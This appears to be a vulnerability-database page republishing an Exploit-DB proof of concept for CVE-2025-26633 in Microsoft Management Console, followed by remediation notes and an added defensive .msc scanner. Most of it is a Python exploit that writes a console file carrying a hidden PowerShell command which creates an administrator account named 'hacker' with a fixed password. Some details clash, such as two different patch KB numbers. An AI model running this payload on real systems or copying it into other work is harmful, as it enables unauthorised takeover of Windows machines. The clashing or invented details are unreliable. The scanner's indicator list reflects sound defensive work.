[local] Microsoft MMC MSC EvilTwin - Local Admin Creation

CVE-2025-26633

The Microsoft Management Console (MMC) is affected by an "EvilTwin" vulnerability in its handling of MSC files that allows a local attacker to create an administrator account.

High · CVSS 7.8

📋 Basic Vulnerability Information

CVE: CVE-2025-26633
Vulnerability type: Security feature bypass / privilege escalation
Affected versions: Microsoft Windows (all supported Windows versions; see the CVE advisory for specifics)
Severity: High · CVSS 7.8
Published: 2026-04-08
Submitter: Mohammed Idrees Banyamer
Source: Exploit-DB (original)

🔬 Root Cause

When MMC processes digitally signed MSC files, it fails to properly verify the integrity and origin of the file contents. This allows an attacker to craft an MSC file that looks legitimate but carries a malicious configuration, bypassing User Account Control (UAC) and executing with elevated privileges.

🎯 Attack Scenario

1. The attacker creates a malicious MSC file containing instructions to create a local administrator, disguised as being signed by a trusted publisher.
2. Through social engineering or other means, the attacker induces the target user to open the MSC file with administrator privileges.
3. MMC loads the file and, because of the signature-verification flaw, treats it as legitimate.
4. The malicious configuration executes and creates a new local administrator account on the target system.
5. The attacker uses that account to gain high-privilege access to the system.

💥 Impact

Local privilege escalation: the attacker can create an administrator account and take full control of the affected system, which may then lead to data theft, malware installation, or lateral movement.

⚔️ Original PoC

The PoC constructs an MSC file that relies on MMC's signature-verification bypass by embedding a user-creation command in the file. The file is designed to look like a legitimate administrative tool but executes backdoor instructions once loaded.

#!/usr/bin/env python3
# GitHub: https://github.com/mbanyamer
# CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks
# Including: Zero-day at time of disclosure (March 2025), actively exploited by Water Gamayun APT
# Impact: Arbitrary code execution with the privileges of the user opening the .msc file
# Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later)
# Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/
# Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
# Target: Unpatched Windows systems (pre March 2025 patches)
# Use ONLY in authorized penetration testing or isolated research labs
import os
import xml.etree.ElementTree as ET

# PAYLOAD: Adds local administrator account "hacker" silently
# (PowerShell command line stored as the action's RunCommand text)
PAYLOAD = (
    'powershell.exe -NoP -W Hidden -C "'
    "$user = 'hacker'; "
    "$pass = ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force; "
    "New-LocalUser -Name $user -Password $pass -FullName 'Lab User' "
    "-Description 'Research account' -ErrorAction SilentlyContinue; "
    "Add-LocalGroupMember -Group 'Administrators' -Member $user "
    "-ErrorAction SilentlyContinue; "
    "Write-Host '[+] User hacker:P@ssw0rd123! added to Administrators'\""
)


def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"):
    # Console file skeleton: string table, one snap-in, one action carrying the command
    root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")
    string_table = ET.SubElement(root, "StringTable")
    ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups"
    ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in"
    snapins = ET.SubElement(root, "SnapIns")
    snapin = ET.SubElement(snapins, "SnapIn")
    ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}"
    ET.SubElement(snapin, "Description").text = "Custom Administration Tool"
    actions = ET.SubElement(snapin, "Actions")
    action = ET.SubElement(actions, "Action")
    ET.SubElement(action, "RunCommand").text = PAYLOAD
    ET.SubElement(action, "Name").text = "AddLocalAdmin"
    tree = ET.ElementTree(root)
    # MMC console files are UTF-16 XML with a declaration
    tree.write(filename, encoding="utf-16", xml_declaration=True)
    print(f"[+] Malicious .msc file successfully created: {filename}")


def main():
    msc_file = "CVE-2025-26633-AddAdmin.msc"
    create_evil_msc(msc_file)
    print("\n[+] Next step (execute inside vulnerable target or lab VM):")
    print(f" mmc.exe \"{os.path.abspath(msc_file)}\"\n")
    print("[!] Instant local admin account will be created:")
    print(" Username : hacker")
    print(" Password : P@ssw0rd123!")
    print(" Verify with: net localgroup administrators")


if __name__ == "__main__":
    main()

🛡️ Remediation

Install the Microsoft security updates released in March 2025 (KB5049622 and others) or later. Interim mitigations include restricting non-administrator users' access to and execution of MSC files, and setting UAC to its highest level.
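As an added defensive example (not code from the Exploit-DB PoC or from this page's author), the following Python triages an .msc console file for embedded command lines such as the PowerShell payload above before anyone opens it with mmc.exe. The element names in COMMAND_TAGS and the indicator list are assumptions chosen for this illustration, and the sample file is constructed inline to mirror the PoC's layout.

```python
#!/usr/bin/env python3
# Added defensive example, not code from the Exploit-DB PoC: triage an .msc console
# file for embedded command lines before anyone opens it with mmc.exe.
import re
import xml.etree.ElementTree as ET

# Assumption: these element names carry command lines (the PoC uses RunCommand).
# Legitimate consoles can also store command lines in taskpads, so hits are leads.
COMMAND_TAGS = {"RunCommand", "Command", "CommandLine"}
# Assumption: indicators a reviewer would want flagged in any console command line.
INDICATORS = re.compile(
    r"powershell|pwsh|cmd\.exe|mshta|rundll32|wscript|cscript|-EncodedCommand|"
    r"-W\s+Hidden|New-LocalUser|Add-LocalGroupMember|net\s+(?:user|localgroup)",
    re.IGNORECASE,
)


def _walk(elem, path):
    """Yield (path, element) for every element in document order."""
    yield path, elem
    for child in elem:
        yield from _walk(child, f"{path}/{child.tag}")


def scan_msc_bytes(data):
    """Return [(element path, indicator)] for one .msc file given as raw bytes.
    .msc files are XML; expat detects the UTF-16 BOM that the PoC's writer emits."""
    root = ET.fromstring(data)
    findings = []
    for path, elem in _walk(root, root.tag):
        text = (elem.text or "").strip()
        hits = [m.group(0) for m in INDICATORS.finditer(text)]
        if elem.tag in COMMAND_TAGS and not hits:
            hits = ["command element"]  # an embedded command line always deserves review
        findings.extend((path, hit) for hit in hits)
    return findings


def build_sample(command):
    """Constructed console file mirroring the PoC's layout, serialised as UTF-16."""
    root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")
    actions = ET.SubElement(ET.SubElement(ET.SubElement(root, "SnapIns"), "SnapIn"), "Actions")
    ET.SubElement(ET.SubElement(actions, "Action"), "RunCommand").text = command
    return ET.tostring(root, encoding="utf-16", xml_declaration=True)


if __name__ == "__main__":
    sample = build_sample('powershell.exe -NoP -W Hidden -C "New-LocalUser -Name x"')
    for path, hit in scan_msc_bytes(sample):
        print(f"[!] {path}: {hit}")
```

To scan a real file, pass `open(path, "rb").read()` to `scan_msc_bytes` and review every returned path by hand, since a command element is normal in some consoles.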

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 07:41 | Source: Exploit-DB
